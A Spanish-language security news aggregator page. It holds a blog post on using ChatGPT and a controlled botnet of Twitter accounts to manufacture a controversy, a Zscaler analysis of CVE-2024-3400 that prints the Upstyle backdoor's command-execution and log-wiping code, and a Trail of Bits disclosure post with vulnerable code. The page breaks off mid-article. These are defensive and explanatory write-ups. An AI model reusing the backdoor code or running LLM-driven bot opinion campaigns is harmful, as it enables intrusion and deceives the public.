Agregador de canales de noticias

Infocon: green

The CVE's They are A-Changing!
Categorías: Security Posts

Cómo crear una Campaña de Polémica en Twitter ( X ) con ChatGPT y una botnet de cuentas controladas #Tistimito

Un informático en el lado del mal - Hace 1 hora 59 mins
El pasado jueves, fui con Carmen Porter e Iker Jiménez al programa a Horizonte a explicar algo que para los que trabajamos en la industria de la ciberseguridad, la reputación online, o la protección de marcas personales y profesionales en las redes, conocemos desde que comenzaron las redes sociales, y que no es nada más que las guerras de opinión de los bots en dichas plataformas sociales y cualquier otro servicio de Internet, para conseguir meter presión a una persona o una empresa y conseguir un objetivo.
Figura 1: Cómo crear una Campaña de Polémica en Twitter ( X )con ChatGPT y una botnet de cuentas controladas #Tistimito
La idea es tan sencilla como controlar un gran número de cuentas en una plataforma, ya sea Twitter (X), Instagram, Google (para darse de alta con la cuenta de Google en todas ellas o poner comentarios en cualquier lugar), Facebook, o "elige-tú-la-plataforma-o-red-donde-quieres-montar-tu-campaña", y después hacer automáticamente con un panel de control que estas cuentas hagan masivamente cosas.  Esto lo hemos visto para hacer muchas cosas malas, como el BlackSEO, o campañas de BlackASO, y por supuesto para generación de "Flames" en redes sociales.
Figura 2: "Ciberestafas: La historia de nunca acabarpor Juan Carlos Galindo en 0xWord.
Los profesionales de la reputación online conocen bien cómo funcionan estas redes de cuentas controladas se utilizan para hacer campañas de apoyo positivo, o campañas negativas, y en el mundo de las ciberestafas es una pieza fundamental para conseguir dar realismo a los engaños que se presentan a sus víctimas.
Figura 3: Comentarios falsos publicados por cuentas controladas en Youtube parapromocionar el contacto de Linda y estafar vía WhatsApp o Telegram
El funcionamiento es sencillo. Un panel de control C&C con el que se controlan las cuentas y se les dan órdenes como una Botnet que son. Estas cuentas son las que realizarán las acciones en la plataforma que sea, ya sea comentarios en Youtube - como en el ejemplo que os dejé de "Linda Fake Broker" -, o en Posts de Twitter (X), o en comentarios de una App en AppStore o Google Play para hacer una campaña de  BlackASO, o lo que quieras.
NewsBender: Crea tu polémica en Twitter X     Para controlar esa cuentas, pues primero hay que tenerlas creadas - ya sea por el dueño del C&C o por una persona real -, y luego controladas. Para manejar esas cuentas, es decir, para tenerlas "control"-"adas", se necesitan o bien las credenciales, o simplemente un Token OAuth. En ambos casos, puede ser controlado legítimamente, por mediante un robo de credenciales o Tokens OAuth, usando muchas de las técnicas que os he contado en no pocas ocasiones, como nuestro Sappo.
Figura 5: Herramienta para Crear Polémicas en Twitter X
En el caso de Twitter (X), que fue lo que preparamos para el programa de Horizonte, nosotros hicimos una herramienta que hacía justo eso, pero para que fuera más fácil y más entendible para las personas, utilizamos ChatGPT, en este caso GPT3.5, para que él mismo nos creara los mensajes, con un porcentaje de mensajes positivos, otro porcentaje negativos. De esto había hablado cuando hablamos de Codeproject: Newsbender para crear noticias automáticas en diarios digitales con ideologías políticas.
En nuestro caso, para la herramienta, permitimos elegir un tema, poner a quién le quieres hacer la campaña positiva, negativa, muy positiva o muy negativa, cuántos mensajes necesitas que te genere ChatGPT, y luego los publicas en las cuentas de Twitter (X) que tenemos en nuestro C&C. Para esta demo lo quisimos hacer solo con 20 cuentas de Twitter (X) que creamos especialmente para esta ocasión, y que habíamos perfilado un poco, con fotos de perfil, con mensajes, con followers y un poco de historial de interacciones.
Figura 6: Mensajes creados por la herramienta asignados a cuentas de Twitter de prueba
Luego, creamos un panel de control desde dónde se configura el tipo de Prompting - puedes verlo en la Figura 5 - que quieres hacer a ChatGPT para que las campañas sean a favor o en contra, y el nivel de intensidad. Dejando que los mensajes sean más o menos duros cuando los cree el modelo GPT. Además, la herramienta permite añadir Hashtags o generarlos automáticamente el modelo, para dar libertad de expresión al modelo o para tener una etiqueta que seguir a la hora de analizar el impacto de la campaña.
Figura 7: Demo de cómo funciona el proceso
Para dar más realismo al "Flame", permitimos que se configuren número de Posts (Tweets) totales que se van a crear y el porcentaje de ellos que van a ser contrarios a la campaña que estamos creando, para que haya debate y más "engagement" con la comunidad humana de Twitter (X). El objetivo final es generar un gran incendio en tres fases:
1.- Los bots prenden la chispa generando el ruido inicial, con debate polémico incluido, para generar efecto llamada a los humanos.  2.- Las cuentas humanas que se ven atraídas hacia la polémica, toman partido y continúan expandiendo el fuego por la red.  3.- El fuego salta de la red a los medios digitales, aprovechando aquellos medios de comunicación que hacen de noticias de lo que pasa en la red.
De esta forma, en el programa, que puedes ver completamente en la web, utilizando la herramienta creamos varias polémicas, una de ellas en contra de Iker Jiménez por haber entrevistado mal a un invitado ficticio que yo llamé Tistimito.
Figura 8: Creando las campañas de polémicas en Twitter (X)
El resultado es que se crearon los Posts (Tweets) de forma automática por ChatGPT, se asignaron con el mismo HashTag a diferentes cuentas de Twitter (X) controladas por el C&C y luego, con un simple botón se publican todas en la red. Puedes ver lo que sucedió en el programa, a partir del minuto 33:40
Figura 8: Polémicas en Twitter X desde el minuto 33:40
Después de eso, la gente ve los mensajes en al red social, se une al debate, azuza el fuego, y el resto es tener un Trending Topic que haga que el fuego llegue a los medios digitales, a los periódicos, informativos, e incluso que meta presión en los ejecutivos y políticos para conseguir objetivos concretos.
Figura 10: Tistimito es Tendencia en España
Pero esto no es nada nuevo, y se lleva haciendo muchos años. El objetivo era mostrar lo sencillo que es hacer esto con la llegada de los LLMs y la GenAI, donde crear los mensajes de texto, los comentarios, etcétera, es un juego de prompting.
¡Saludos Malignos!
Autor: Chema Alonso (Contactar con Chema Alonso)  


Sigue Un informático en el lado del mal RSS 0xWord
- Contacta con Chema Alonso en MyPublicInbox.com
Categorías: Security Posts

AI-Controlled Fighter Jets Are Dogfighting With Human Pilots Now

Wired: Security - Hace 3 horas 44 segs
Plus: New York’s legislature suffers a cyberattack, police disrupt a global phishing operation, and Apple removes encrypted messaging apps in China.
Categorías: Security Posts

The CVE's They are A-Changing!, (Wed, Apr 17th)

SANS Internet Storm Center, InfoCON: green - Vie, 2024/04/19 - 20:12
The downloadable format of CVE's from Miter will be changing in June 2024, so if you are using CVE downloads to populate your scanner, SIEM or to feed a SOC process, now would be a good time to look at that.  If you are a vendor and use these downloads to populate your own feeds or product database, if you're not using the new format already you might be behind the eight ball! The old format (CVE JSON 4.0) is being replaced by CVE JSON 5.0, full details can be found here:
https://www.cve.org/Media/News/item/blog/2023/03/29/CVE-Downloads-in-JSON-5-Format You can play with the actual files here: https://github.com/CVEProject/cvelistV5 (ps the earworm is free!) ===============
Rob VandenBrink
rob@coherentsecurity.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categorías: Security Posts

The Biggest Deepfake Porn Website Is Now Blocked in the UK

Wired: Security - Vie, 2024/04/19 - 18:54
The world's most-visited deepfake website and another large competing site are stopping people in the UK from accessing them, days after the UK government announced a crackdown.
Categorías: Security Posts

Microsoft’s VASA-1 can deepfake a person with one photo and one audio track

ArsTechnica: Security Content - Vie, 2024/04/19 - 15:07
Enlarge / A sample image from Microsoft for "VASA-1: Lifelike Audio-Driven Talking Faces Generated in Real Time." (credit: Microsoft) On Tuesday, Microsoft Research Asia unveiled VASA-1, an AI model that can create a synchronized animated video of a person talking or singing from a single photo and an existing audio track. In the future, it could power virtual avatars that render locally and don't require video feeds—or allow anyone with similar tools to take a photo of a person found online and make them appear to say whatever they want. "It paves the way for real-time engagements with lifelike avatars that emulate human conversational behaviors," reads the abstract of the accompanying research paper titled, "VASA-1: Lifelike Audio-Driven Talking Faces Generated in Real Time." It's the work of Sicheng Xu, Guojun Chen, Yu-Xiao Guo, Jiaolong Yang, Chong Li, Zhenyu Zang, Yizhong Zhang, Xin Tong, and Baining Guo. The VASA framework (short for "Visual Affective Skills Animator") uses machine learning to analyze a static image along with a speech audio clip. It is then able to generate a realistic video with precise facial expressions, head movements, and lip-syncing to the audio. It does not clone or simulate voices (like other Microsoft research) but relies on an existing audio input that could be specially recorded or spoken for a particular purpose.Read 11 remaining paragraphs | Comments
Categorías: Security Posts

A Look at CVE-2024-3400 Activity and Upstyle Backdoor Technical Analysis

Zscaler Research - Jue, 2024/04/18 - 03:11
IntroductionRecently, a zero-day command-injection vulnerability, assigned to CVE-2024-3400, was found in the Palo Alto Networks PAN-OS. It was assigned the maximum severity score of 10.0 and can be exploited by an unauthenticated user to run arbitrary commands on the target system with root privileges.Volexity was the first to identify and report the vulnerability. Since then, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3400 to its Known Exploited Vulnerability Catalog.In this blog, we will share the vulnerability exploitation activity observed by Zscaler’s global intelligence network. And, we will examine the recently-discovered Python-based backdoor and its novel interaction mechanism with the operator.Key TakeawaysZscaler’s global intelligence network picked up CVE-2024-3400 activity right after the exploitation script was released.The backdoor utilizes a .pth file for auto-execution and employs a novel indirect interaction with the backdoor by sending commands via error logs and receiving the output through a publicly accessible stylesheet.On the same day the vulnerability was publicly disclosed, an exploitation Python-based script was also released to the public on GitHub, making it easier for other cyber criminals to exploit or test the appliances for this vulnerability. Activity Observed by ZscalerZscaler’s global intelligence network picked up activity from various known malicious sources targeting appliances across multiple customers. This activity was picked up almost immediately after the publication of the exploitation script on GitHub. The activity does not appear to target any particular region or industry vertical.Most of the activity observed originated from malicious IPs already known to be associated with vulnerability scanning, Redline Stealer, and EvilProxy. However, one IP stands out from this group. We believe the IP address 67.55.94[.]84 is associated with a VPN provider. No other activity from this IP has been observed. Currently, there is insufficient evidence to attribute this IP to any specific threat actor.Technical AnalysisWe suspect the attackers intended to incorporate Upstyle in their attack sequence. Upstyle, a sophisticated backdoor initially identified by Volexity, employs innovative techniques for persistence, command reception, and output sharing with the operator. Attack flowThe figure below shows how the attack flow would unfold.Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. Upstyle backdoorThe backdoor consists of three layers.The first outer layer is the installer which contains the next layer in a base64-encoded format.Layer 1 - InstallerThe installer layer writes the next layer to the following path: /usr/lib/python3.6/site-packages/system.pth. Additionally, it will set the last access time and last modified time of the system.pth file to the same respective time as the installer script.Finally, the installer script deletes itself and the /opt/pancfg/mgmt/licenses/PA_VM`* file.The file path and the extension have special significance. Since the release of Python 3.5, any .pth file under site-packages is run at every Python startup and the lines starting with import (followed by space or tab) are executed, thereby setting up a unique auto-execution mechanism for the malicious code whenever any Python code is run on the system.Layer 2 - LauncherThis layer contains the functional backdoor as another base64-encoded blob of code. It contains two functions named protect and check.protect: This function likely protects the persistence mechanism and makes sure the backdoor stays in the system.pth file. It reads the contents of system.pth and adds a handler for the termination signal. The handler will write back the contents of the system.pth file before terminating. check: This method is called after the protect method. It will check if it is running as /usr/local/bin/monitor mp by checking the file /proc/self/cmdline. If it is, the backdoor code will be executed. This could be a way to control the execution of the backdoor and avoid running multiple duplicates of the backdoor thread.Layer 3 - BackdoorOn start, this backdoor will read the content, last access time, and last modified time of the file /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css so it can be restored later.Then, it goes into an infinite loop and starts monitoring the error log file at /var/log/pan/sslvpn_ngx_error.log looking for one of the following regular expressions: img\[([a-zA-Z0-9+/=]+)\] or img\{base64encoded_command}\.When a line matches, the pattern is found, the command is base64 decoded, executed, and the output is appended to the bootstrap.min.css file inside the comment tags, /* {command output here} */.Finally, the log file is purged of the attacker’s generated error logs containing the malicious commands, and the error-log-file timestamps are restored. After 15 seconds the content and timestamps of the bootstrap.min.css file are also restored.-- [snip] -- css_path = '/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css' content = open(css_path).read() atime=os.path.getatime(css_path) mtime=os.path.getmtime(css_path) while True: try: SHELL_PATTERN = 'img\[([a-zA-Z0-9+/=]+)\]' lines = [] WRITE_FLAG = False for line in open("/var/log/pan/sslvpn_ngx_error.log",errors="ignore").readlines(): rst = re.search(SHELL_PATTERN,line) if rst: WRITE_FLAG = True cmd = base64.b64decode(rst.group(1)).decode() try: output = os.popen(cmd).read() with open(css_path,"a") as f: f.write("/*"+output+"*/") except Exception as e: pass continue lines.append(line) if WRITE_FLAG: atime=os.path.getatime("/var/log/pan/sslvpn_ngx_error.log") mtime=os.path.getmtime("/var/log/pan/sslvpn_ngx_error.log") with open("/var/log/pan/sslvpn_ngx_error.log","w") as f: f.writelines(lines) os.utime("/var/log/pan/sslvpn_ngx_error.log",(atime,mtime)) import threading threading.Thread(target=restore,args=(css_path,content,atime,mtime)).start() except: pass time.sleep(2) -- [snip] --- ConclusionCVE-2024-3400 is a highly severe vulnerability. There was an uptick in malicious activity soon after the exploitation script was released to the public on GitHub.The founding principles of the Zero Trust Exchange Platform™, a zero trust architecture, and Defense in depth should be used in combination to defend against such attacks. In addition to deploying detection rules and monitoring for suspicious activity in environments, security teams should also adopt Deception Engineering. Strategic use of this technology can make it impossible for the adversary to move in the environment without tripping alerts.Indicators Of Compromise (IOCs)Vulnerability scan originating IPsIPComment23.227.194.230Known Malicious IP154.88.26.223Known Malicious IP206.189.14.205Known Malicious IP67.55.94.84SaferVPN IPSHA256 Hashesab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f33de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb
Categorías: Security Posts

Introduction to Software Composition Analysis and How to Select an SCA Tool

AlienVault Blogs - Mié, 2024/04/17 - 12:00
The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.  Software code is constantly growing and becoming more complex, and there is a worrying trend: an increasing number of open-source components are vulnerable to attacks. A notable instance was the Apache Log4j library vulnerability, which posed serious security risks. And this is not an isolated incident. Using open-source software necessitates thorough Software Composition Analysis (SCA) to identify these security threats. Organizations must integrate SCA tools into their development workflows while also being mindful of their limitations. Why SCA Is Important Open-source components have become crucial to software development across various industries. They are fundamental to the construction of modern applications, with estimates suggesting that up to 96% of the total code bases contain open-source elements. Assembling applications from diverse open-source blocks presents a challenge, necessitating robust protection strategies to manage and mitigate risks effectively. Software Composition Analysis is the process of identifying and verifying the security of components within software, especially open-source ones. It enables development teams to efficiently track, analyze, and manage any open-source element integrated into their projects. SCA tools identify all related components, including libraries and their direct and indirect dependencies. They also detect software licenses, outdated dependencies, vulnerabilities, and potential exploits. Through scanning, SCA creates a comprehensive inventory of a project's software assets, offering a full view of the software composition for better security and compliance management. Although SCA tools have been available for quite some time, the recent open-source usage surge has cemented their importance in application security. Modern software development methodologies, such as DevSecOps, emphasize the need for SCA solutions for developers. The role of security officers is to guide and assist developers in maintaining security across the Software Development Life Cycle (SDLC), ensuring that SCA becomes an integral part of creating secure software. Objectives and Tasks of SCA Tools Software Composition Analysis broadly refers to security methodologies and tools designed to scan applications, typically during development, to identify vulnerabilities and software license issues. For effective management of open-source components and associated risks, SCA solutions help navigate several tasks: 1) Increasing Transparency A developer might incorporate various open-source packages into their code, which in turn may depend on additional open-source packages unknown to the developer. These indirect dependencies can extend several levels deep, complicating the understanding of exactly which open-source code the application uses. Reports indicate that 86% of vulnerabilities in node.js projects stem from transitive (indirect) dependencies, with similar statistics in the Java and Python ecosystems. This suggests that most security vulnerabilities in applications often originate from open-source code that developers might not even be aware of. For cloud applications, open-source components in container images can also pose transparency challenges, requiring identification and vulnerability scanning. While the abstraction containers offer to programmers is beneficial for development, it simultaneously poses a security risk, as it can obscure the details of the underlying components. 2) Grasping the Logic of Dependencies Accurately identifying dependencies - and the vulnerabilities they introduce - demands a comprehensive understanding of each ecosystem's unique handling of them. It is crucial for an SCA solution to recognize these nuances and avoid generating false positives. 3) Prioritizing Vulnerabilities Due to the limited resources at the disposal of developers and security professionals, prioritizing vulnerabilities becomes a significant challenge without the required data and knowledge. While the Common Vulnerability Scoring System (CVSS) offers a method for assessing vulnerabilities, its shortcomings make it somewhat challenging to apply effectively. The main issues with CVSS stem from the variance in environments, including how they are operated, designed, and put together. Additionally, CVSS scores do not consider the age of a vulnerability or its involvement in exploit chains, further complicating their usage. 4) Building an Updated, Unified Vulnerability Database A vast array of analytical data on vulnerabilities is spread out over numerous sources, including national databases, online forums, and specialized security publications. However, there is often a delay in updating these sources with the latest vulnerability information. This delay in reporting can be critically detrimental. SCA tools help address this issue by aggregating and centralizing vulnerability data from a wide range of sources. 5) Speeding Up Secure Software Development Before the code progresses in the release process, it must undergo a security review. If the services tasked with checking for vulnerabilities do not do so swiftly, this can slow down the entire process. The use of AI test automation tools offers a solution to this issue. They enable the synchronization of development and vulnerability scanning processes, preventing unforeseen delays. The challenges mentioned above have spurred the development of the DevSecOps concept and the "Shift Left" approach, which places the responsibility for security directly on development teams. Guided by this principle, SCA solutions enable the verification of the security of open-source components early in the development process, ensuring that security considerations are integrated from the outset. Important Aspects of Choosing and Using SCA Tools Software Composition Analysis systems have been in existence for over a decade. However, the increasing reliance on open-source code and the evolving nature of application assembly, which now involves numerous components, have led to the introduction of various types of solutions. SCA solutions range from open-source scanners to specialized commercial tools, as well as comprehensive application security platforms. Additionally, some software development and maintenance solutions now include basic SCA features. When selecting an SCA system, it is helpful to evaluate the following capabilities and parameters: ● Developer-Centric Convenience Gone are the days when security teams would simply pass a list of vulnerabilities to developers to address. DevSecOps mandates a greater level of security responsibility on developers, but this shift will not be effective if the tools at their disposal are counterproductive. An SCA tool that is challenging to use or integrate will hardly be beneficial. Therefore, when selecting an SCA tool, make sure it can: - Be intuitive and straightforward to set up and use - Easily integrate with existing workflows - Automatically offer practical recommendations for addressing issues ● Harmonizing Integration in the Ecosystem An SCA tool's effectiveness is diminished if it cannot accommodate the programming languages used to develop your applications or fit seamlessly into your development environment. While some SCA solutions might offer comprehensive language support, they might lack, for example, a plugin for Jenkins, which would allow for the straightforward inclusion of application security testing within the build process or modules for the Integrated Development Environment (IDE). ● Examining Dependencies Since many vulnerabilities are tied to dependencies, whose exploitation can often only be speculated, it is important when assessing an SCA tool to verify that it can accurately understand all the application's dependencies. This ensures those in charge have a comprehensive view of the security landscape. It would be good if your SCA tool could also provide a visualization of dependencies to understand the structure and risks better. ● Identifying Vulnerabilities An SCA tool's ability to identify vulnerabilities in open-source packages crucially depends on the quality of the security data it uses. This is the main area where SCA tools differ significantly. Some tools may rely exclusively on publicly available databases, while others aggregate data from multiple proprietary sources into a continuously updated and enriched database, employing advanced analytical processes. Even then, nuances in the database's quality and the accuracy and comprehensiveness of its intelligence can vary, impacting the tool's effectiveness. ● Prioritizing Vulnerabilities SCA tools find hundreds or thousands of vulnerabilities, a volume that can swiftly become unmanageable for a team. Given that it is practically unfeasible to fix every single vulnerability, it is vital to strategize which fixes will yield the most significant benefit. A poor prioritization mechanism, particularly one that leads to an SCA tool frequently triggering false positives, can create unnecessary friction and diminish developers' trust in the process. ● Fixing Vulnerabilities Some SCA tools not only detect vulnerabilities but also proceed to the logical next step of patching them. The range of these patching capabilities can differ significantly from one tool to another, and this variability extends to the recommendations provided. It is one matter to suggest upgrading to a version that resolves a specific vulnerability; it is quite another to determine the minimal update path to prevent disruptions. For example, some tools might automatically generate a patch request when a new vulnerability with a recommended fix is identified, showcasing the advanced and proactive features that differentiate these tools in their approach to securing applications. ● Executing Oversight and Direction It is essential to choose an SCA tool that offers the controls necessary for managing the use of open-source code within your applications effectively. The ideal SCA tool should come equipped with policies that allow for detailed fine-tuning, enabling you to granularly define and automatically apply your organization's specific security and compliance standards. ● Reports   Tracking various open-source packages over time, including their licenses, serves important purposes for different stakeholders. Security teams, for example, may want to evaluate the effectiveness of SCA processes by monitoring the number and remediation of identified vulnerabilities. Meanwhile, legal departments might focus on compiling an inventory of all dependencies and licenses to ensure the organization's adherence to compliance and regulatory requirements. Your selected SCA tool should be capable of providing flexible and detailed reporting to cater to the diverse needs of stakeholders. ● Automation and Scalability Manual tasks associated with SCA processes often become increasingly challenging in larger development environments. Automating tasks like adding new projects and users for testing or scanning new builds within CI/CD pipelines not only enhances efficiency but also helps avoid conflicts with existing workflows. Modern SCA tools should use machine learning for improved accuracy and data quality. Another critical factor to consider is the availability of a robust API, which enables deeper integration. Moreover, the potential for interaction with related systems, such as Security Orchestration, Automation, and Response (SOAR) and Security Information and Event Management (SIEM), in accessing information on security incidents, is also noteworthy. ● Application Component Management Modern applications consist of numerous components, each requiring scanning and protection. A modern SCA tool should be able to scan container images for vulnerabilities and seamlessly integrate into the workflows, tools, and systems used for building, testing, and running these images. Advanced solutions may also offer remedies for identified flaws in containers. Conclusion Every organization has unique requirements influenced by factors like technology stack, use case, budget, and security priorities. There is no one-size-fits-all solution for Software Composition Analysis. However, by carefully evaluating the features, capabilities, and integration options of various SCA tools, organizations can select a solution that best aligns with their specific needs and enhances their overall security posture. The chosen SCA tool should accurately identify all open-source components, along with their associated vulnerabilities and licenses.
Categorías: Security Posts

5 reasons to strive for better disclosure processes

By Max Ammann This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes. Here are the five bugs: Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner. In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:
  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE
Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post. Case 1: Undefined behavior in borsh-rs Rust library The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years. During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug. The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub. I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed. The following code contained the bug that caused undefined behavior: impl<T> BorshDeserialize for Vec<T> where T: BorshDeserialize, { #[inline] fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> { let len = u32::deserialize(reader)?; if size_of::<T>() == 0 { let mut result = Vec::new(); result.push(T::deserialize(reader)?); let p = result.as_mut_ptr(); unsafe { forget(result); let len = len as usize; let result = Vec::from_raw_parts(p, len, len); Ok(result) } } else { // TODO(16): return capacity allocation when we can safely do that. let mut result = Vec::with_capacity(hint::cautious::<T>(len)); for _ in 0..len { result.push(T::deserialize(reader)?); } Ok(result) } } } Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150) The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable. The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness. Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI In July, I disclosed multiple DoS vulnerabilities in four Ethereum API–parsing libraries, which were difficult to report because I had to reach out to multiple parties. The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing: https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa
71b40dae1f597bc063bdf.patch
In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort. Read more about the technical details of this bug in the blog post Billion times emptiness. Case 3: Missing limit on authentication tag length in Expo In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software. When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, secure@expo.io, an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year. Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had. Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext: /* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException { byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8); byte[] ciphertextBytes = cipher.doFinal(plaintextBytes); String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP); String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP); int authenticationTagLength = gcmSpec.getTLen(); JSONObject result = new JSONObject() .put(CIPHERTEXT_PROPERTY, ciphertext) .put(IV_PROPERTY, ivString) .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength); postEncryptionCallback.run(promise, result); return result; } Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java) For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore. An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST. From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there. The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits. The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately. Case 4: DoS vector in the num-bigint Rust library In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE. The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear. But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails. The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature: use num_bigint::BigUint; use std::io::Read; fn main() -> std::io::Result<()> { let mut buf = Vec::new(); let _ = std::io::stdin().read_to_end(&mut buf)?; let _: BigUint = bincode::deserialize(&buf).unwrap_or_default(); Ok(()) } Figure 3: Example deserialization format It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed. impl<'de> Visitor<'de> for U32Visitor { type Value = BigUint; {...omitted for brevity...} #[cfg(not(u64_digit))] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { let len = seq.size_hint().unwrap_or(0); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } #[cfg(u64_digit)] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { use crate::big_digit::BigDigit; use num_integer::Integer; let u32_len = seq.size_hint().unwrap_or(0); let len = Integer::div_ceil(&u32_len, &2); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } } Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108) We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4. Case 5: Insertion of MMKV database encryption key into Android system 